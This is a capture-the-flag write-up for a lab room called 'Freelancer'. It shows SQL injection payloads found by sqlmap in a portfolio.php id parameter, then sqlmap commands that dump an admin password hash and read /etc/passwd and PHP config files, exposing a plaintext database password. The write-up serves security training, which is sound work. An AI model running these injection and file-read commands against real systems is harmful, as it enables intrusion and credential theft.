# Room Info
- Name: Freelancer
- 30 points
- Medium Difficulty

# Process
- Submitted a test request in the contact form
- Notified: Mail server is down

- Run Dirbuster > found /mail directory

- navigate to http://178.128.171.88:30519/mail/ to find contact_me.php

-found portfolio.php/?id=1 in source code > could be a vuln for SQL injection

- run SQL map

results:
```Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4679=4679
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1491 FROM (SELECT(SLEEP(5)))TDTY)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,          0x4b566d7458436c775576597755515a63714a6c6348456e4168487a676e585a58505663415563794c,0x7162766271)-- -
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
```
Discover Database
run `sqlmap http://178.128.171.88:30519/portfolio.php?id=1 --dbs`

```
[*] freelancer
[*] information_schema
[*] mysql
[*] performance_schema
```

run `sqlmap http://178.128.171.88:30519/portfolio.php?id=1 --tables -D freelancer`

results: 
```Database: freelancer
[2 tables]
+-----------+
| portfolio |
| safeadmin |
+-----------+
```
to see tables, run `sqlmap http://178.128.171.88:30519/portfolio.php?id=1 --columns -D freelancer -T safeadmin`
results 
```Table: safeadmin
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| id         | int(11)      |
| password   | varchar(255) |
| created_at | datetime     |
| username   | varchar(50)  |
+------------+--------------+
```
dumping data from safeadmin table
run `sqlmap http://178.128.171.88:30519/portfolio.php?id=1 --dump -D freelancer -T safeadmin`

results: 
Table: safeadmin
```
[1 entry]
+------+----------+--------------------------------------------------------------+---------------------+
| id   | username | password                                                     | created_at          |
+------+----------+--------------------------------------------------------------+---------------------+
| 1    | safeadm  | $2y$10$s2ZCi/tHICnA97uf4MfbZuhmOZQXdCnrM9VM9LBMHPp68vAXNRf4K | 2019-07-16 20:25:45 |
```
found hashed password, using hashcat to crack. > hashcat failed

 I have no idea what kind of hash this is
Decided to spend sometime researching

what kind of users we have in this database? 

run `sqlmap 178.128.171.88:30519/portfolio.php?id=1 --users --privileges`
results: found user `db_user` with a bunch of privileges

```[*] 'db_user'@'%' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE```

found password hash as welll 

```db_user [1]:
    password hash: *333B6293F0FD8FF1F9D218E941B68C2525425C4C
```

see if I can read the etc/passwd file
run `sqlmap 178.128.171.88:30519/portfolio.php?id=1 --file-read=/etc/passwd`

found `mail:x:8:8:mail:/var/mail:/usr/sbin/nologin`

Dirbuster also
found http://178.128.171.88:30519/administrat/
this page contains a login page
found index.php in that dir too so run the  read file again 

run `sqlmap 178.128.171.88:30519/portfolio.php?id=1 --file-read=/var/www/html/administrat/include/index.php`


found 2 php files

```// Include config file
require_once "include/config.php";
```

and 

`header("location: panel.php");`

1) see if I can read the index file

run `sqlmap 178.128.171.88:30519/portfolio.php?id=1 --file-read=/var/www/html/administrat/include/config.php`

found the password for `db-user`

results: `$link = new mysqli("localhost", "db_user", "Str0ngP4ss", "freelancer");`

2) Read the panel.php file
run `sqlmap 178.128.171.88:30519/portfolio.php?id=1 --file-read=/var/www/html/administrat/panel.php`

FOUND THE FLAG!!!!


